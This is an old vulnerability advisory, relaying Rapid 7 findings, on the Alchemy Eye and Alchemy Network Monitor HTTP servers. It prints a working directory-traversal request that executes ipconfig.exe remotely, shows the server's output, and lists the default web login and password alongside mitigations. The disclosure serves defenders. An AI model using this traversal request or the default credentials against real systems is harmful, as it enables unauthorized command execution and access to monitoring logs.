COMMAND

	Alchemy Eye

SYSTEMS AFFECTED

	 Alchemy Eye and Alchemy Network Monitor v1.9x through v2.6.18

	 Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10

PROBLEM

	In Rapid 7 advisories (R7-0001 & R7-0002) two bugs  on  Alchemy  Eye
	and Alchemy Network Monitor were pointed out (Alchemy  Eye  and  Alchemy
	Network Monitor are network management tools for Microsoft Windows.  The
	product contains a  built-in  HTTP  server  for  remote  monitoring  and
	control) :
	

	 Remote Command

	 ==============

	The web server used by Alchemy is vulnerable to the /../../ bug.
	

	$ telnet localhost 80

	          Trying 127.0.0.1...

	          Connected to localhost.

	          Escape character is \'^]\'.

	          GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

	

	          HTTP/1.0 200 OK

	          Date: Thu, 29 Nov 2001 18:20:00 GMT

	          Server: Alchemy Eye/2.0.20

	          MIME-version: 1.0

	          Content-Type: text/html

	          Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe

	          Content-Length: 275

	

	

	          Windows 2000 IP Configuration

	

	          Ethernet adapter Cable:

	

	                  Connection-specific DNS Suffix  . : foo.bar.com

	                  IP Address. . . . . . . . . . . . : 192.168.0.2

	                  Subnet Mask . . . . . . . . . . . : 255.255.255.0

	                  Default Gateway . . . . . . . . . : 192.168.0.1

	

	

	 Authentication

	 ==============

	

	If nothing has been changed in the eye.ini configuration  file,  default
	login/password will permit access to all logs. Default login/pass is :
	

	Login=webuser

	Password=webpass

	

SOLUTION

	Accordingly with Rapid 7 advisories :
	

	

	The current version of the product is VULNERABLE.  Future  versions  may
	also be vulnerable. If you are using any of the vulnerable versions,  we
	suggest the following:
	

	(a) Disable HTTP access completely via  Preferences.  You  must  restart
	the product for this to take effect.
	

	or, (b) Require HTTP authentication via Preferences.  You  must  restart
	the product for  this  to  take  effect.  This  is  only  possible  with
	versions 2.6.x  and  later  (earlier  versions  have  no  authentication
	option).
	

	(c) Create a very restricted user account  and  run  the  product  under
	those credentials.
	

	

	

	

	

	

	

	

	

	

	Disclaimer and Copyright
	

	    Rapid 7, Inc. is not responsible for the misuse of the information

	    provided in our security advisories. These advisories are a service

	    to the professional security community.  There are NO WARRANTIES

	    with regard to this information. Any application or distribution of

	    this information constitutes acceptance AS IS, at the user\'s own

	    risk.  This information is subject to change without notice.

	

	    This advisory Copyright (C) 2001 Rapid 7, Inc.  Permission is

	    hereby granted to redistribute this advisory in electronic media

	    only, providing that no changes are made and that the copyright

	    notices and disclaimers remain intact.  This advisory may not be

	    printed or distributed in non-electronic media without the

	    express written permission of Rapid 7, Inc.